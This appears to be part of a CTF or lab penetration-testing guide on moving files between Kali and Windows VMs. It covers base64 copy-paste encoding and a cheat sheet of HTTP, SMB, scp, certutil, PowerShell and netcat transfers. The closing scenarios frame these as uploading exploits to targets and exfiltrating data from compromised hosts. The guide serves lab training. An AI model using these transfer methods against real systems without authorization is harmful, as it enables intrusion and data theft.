Best for: Small files, when no network transfer is possible, very restricted environments

Prerequisites: None - works without network connectivity

When you can't transfer files directly (no network, all other methods blocked), you can encode them as text, copy/paste manually, and decode. This is a last-resort method.

Scenario A: Transfer from Kali to Windows

Step 1: On Kali Linux VM - Encode the file

base64 file.txt > file.txt.b64

Or encode and display:

base64 file.txt

For binary files:

base64 exploit.exe > exploit.exe.b64

Step 2: Copy the base64 text

cat file.txt.b64

Select and copy all the output (use shared clipboard or type it manually if needed).

Step 3: On Windows VM - Decode the file

Using PowerShell:

# Paste the base64 string into a variable
$base64 = "SGVsbG8gV29ybGQhCg=="

# Decode and save to file
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64)) | Out-File -FilePath decoded.txt -Encoding UTF8

For binary files:

$base64 = "TVqQAAMAAAAEAAAA//8AALgAAAAA..."
[System.IO.File]::WriteAllBytes("C:\Temp\decoded.exe", [System.Convert]::FromBase64String($base64))

Using certutil:

# Save base64 text to a file first (e.g., encoded.txt)
certutil -decode encoded.txt decoded.exe

Scenario B: Transfer from Windows to Kali

Step 1: On Windows VM - Encode the file

Using PowerShell:

$fileContent = Get-Content -Path "C:\file.txt" -Raw
$bytes = [System.Text.Encoding]::UTF8.GetBytes($fileContent)
$base64 = [System.Convert]::ToBase64String($bytes)
$base64

For binary files:

$bytes = [System.IO.File]::ReadAllBytes("C:\tool.exe")
$base64 = [System.Convert]::ToBase64String($bytes)
$base64 | Out-File -FilePath encoded.txt

Using certutil:

certutil -encode file.txt encoded.txt

Step 2: Copy the base64 text

Step 3: On Kali Linux VM - Decode the file

# If you have the base64 string in a file
base64 -d encoded.txt > decoded.exe

Or decode from clipboard:

echo "SGVsbG8gV29ybGQhCg==" | base64 -d > decoded.txt

When to Use Base64 Transfer

• No network connectivity between VMs

• All other transfer methods are blocked

• Transferring very small files or scripts

• Working in highly restricted environments

• Need to transfer data through a text-only channel (e.g., clipboard, terminal output)

Limitations

• Inefficient for large files (33% size increase)

• Manual copy/paste is error-prone

• Time-consuming for anything but small files

• Not suitable for files larger than a few KB

Command Cheat Sheet

Python HTTP Server:

# On source machine (Kali or Windows)
python3 -m http.server 8000

# On destination machine
wget http://SOURCE_IP:8000/file.txt
curl http://SOURCE_IP:8000/file.txt -o file.txt

SMB Share (Kali to Windows):

# On Kali
impacket-smbserver share ~/smb-share -smb2support

# On Windows
copy \\KALI_IP\share\file.txt C:\

SCP:

# Upload to Kali
scp file.txt kali@KALI_IP:~/

# Download from Kali
scp kali@KALI_IP:~/file.txt ./

PowerShell Download:

Invoke-WebRequest -Uri http://KALI_IP:8000/file.txt -OutFile file.txt
iwr http://KALI_IP:8000/file.txt -OutFile file.txt

Certutil Download:

certutil -urlcache -f http://KALI_IP:8000/file.exe file.exe

Curl Download:

curl http://KALI_IP:8000/file.txt -o file.txt

Netcat:

# Receiver
nc -lvp 4444 > file.txt

# Sender
nc RECEIVER_IP 4444 < file.txt

Additional Resources

Tools to Install

On Kali Linux:

# Install system packages via apt (recommended - always check apt first)
sudo apt update
sudo apt install python3-impacket smbclient cifs-utils vsftpd openssh-server netcat-traditional

# Install Python applications via pipx (if not available in apt)
# IMPORTANT: Use pipx WITHOUT sudo - installs for current user
pipx install impacket
pipx install uploadserver
pipx install pyftpdlib

Important notes about pipx on Kali Linux:

• Starting Kali Linux 2024.4, pip3 install is strongly discouraged and will fail with "externally-managed-environment" error

• Always use pipx install without sudo - this installs for your current user to ~/.local/bin

• Do NOT use sudo pipx install - this installs for root user only (commands won't be accessible to regular user)

• After installation, commands are available directly from terminal (e.g., uploadserver, impacket-smbserver)

• Always prefer apt packages first, use pipx only if package is not available via apt

On Windows:

• Python: https://www.python.org/downloads/

• Netcat: https://eternallybored.org/misc/netcat/

• Wget: https://eternallybored.org/misc/wget/

• Nmap (includes ncat): https://nmap.org/download.html

Learning Resources

Documentation:

• Impacket GitHub: https://github.com/fortra/impacket

• PowerShell Documentation: https://docs.microsoft.com/powershell/

• SMB Protocol: https://docs.microsoft.com/windows-server/storage/file-server/

Common CTF/Lab Scenarios

Scenario 1: Upload exploit to Windows target

• Best method: Python HTTP Server on Kali + PowerShell download on Windows

• Alternative: Certutil, Curl

Scenario 2: Download files from compromised Windows

• Best method: Impacket SMB Server on Kali + copy from Windows

• Alternative: Python HTTP Server on Windows + wget on Kali

Scenario 3: Transfer tools during privilege escalation

• Best method: Netcat (if available)

• Alternative: Base64 encoding (if no network access)

Scenario 4: Exfiltrate data from restricted environment

• Best method: Base64 encoding + manual copy

• Alternative: DNS tunneling (advanced)

Happy hacking and always try harder!